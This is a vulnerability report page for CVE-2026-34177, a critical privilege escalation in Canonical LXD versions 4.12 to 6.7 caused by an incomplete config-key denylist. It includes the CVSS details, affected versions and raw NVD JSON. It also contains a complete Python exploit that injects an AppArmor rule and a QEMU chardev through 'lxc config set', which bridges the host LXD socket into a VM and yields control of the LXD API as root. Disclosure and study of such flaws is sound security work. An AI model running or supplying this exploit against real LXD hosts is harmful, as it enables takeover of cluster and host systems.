Security Vulnerability Report
中文
CVE-2026-34177 CVSS 9.1 CRITICAL

CVE-2026-34177

Published: 2026-04-09 10:16:22
Last Modified: 2026-04-22 20:57:23
Source: [email protected]

Description

Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* - VULNERABLE
Canonical LXD 4.12 - 6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import subprocess import sys # Exploit for CVE-2026-34177: LXD Privilege Escalation via Config Injection # Target: Canonical LXD 4.12 <= 6.7 TARGET_VM = "target-vm" LXD_SOCKET_PATH = "/var/snap/lxd/common/lxd/unix.socket" def exploit(): print(f"[*] Attempting to exploit {TARGET_VM}...") # 1. Inject AppArmor rule to allow access to the LXD Unix socket # This overrides the security profile blocking the socket apparmor_payload = f"unix (connect, send, receive) type=stream addr=\"@{LXD_SOCKET_PATH}\"," print(f"[*] Injecting AppArmor rule: {apparmor_payload}") try: subprocess.run(["lxc", "config", "set", TARGET_VM, "raw.apparmor", apparmor_payload], check=True) except subprocess.CalledProcessError as e: print(f"[-] Failed to set raw.apparmor: {e}") sys.exit(1) # 2. Inject QEMU configuration to bridge the socket into the VM # This creates a virtio-serial port connected to the host socket qemu_payload = f""" [chardev "lxd-sock"] path = "{LXD_SOCKET_PATH}" backend = "socket" [device "dev-lxd-sock"] driver = "virtio-serial-pci" [device "port-lxd-sock"] driver = "virtserialport" name = "org.linuxcontainers.lxd" chardev = "lxd-sock" """ print("[*] Injecting QEMU chardev configuration...") try: subprocess.run(["lxc", "config", "set", TARGET_VM, "raw.qemu.conf", qemu_payload], check=True) except subprocess.CalledProcessError as e: print(f"[-] Failed to set raw.qemu.conf: {e}") sys.exit(1) # 3. Restart the VM to apply the configuration changes print(f"[*] Restarting {TARGET_VM} to apply changes...") try: subprocess.run(["lxc", "restart", TARGET_VM, "--force"], check=True) except subprocess.CalledProcessError as e: print(f"[-] Failed to restart VM: {e}") sys.exit(1) print("[+] Exploit successful!") print(f"[+] The LXD Unix socket is now available inside the VM at /dev/virtio-ports/org.linuxcontainers.lxd") print("[+] You can now interact with the LXD API as root from within the VM.") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34177", "sourceIdentifier": "[email protected]", "published": "2026-04-09T10:16:21.653", "lastModified": "2026-04-22T20:57:22.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-184"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.12", "versionEndIncluding": "5.0.6", "matchCriteriaId": "41A5CC7C-00BE-436D-957A-4636E52D0DF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.21.0", "versionEndIncluding": "5.21.4", "matchCriteriaId": "92A82DF4-3ED9-47E0-BDF1-DB9138EE0883"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.7", "matchCriteriaId": "5C28FC63-0BE4-4B40-A87F-DF242AE33303"}]}]}], "references": [{"url": "https://github.com/canonical/lxd/pull/17909", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.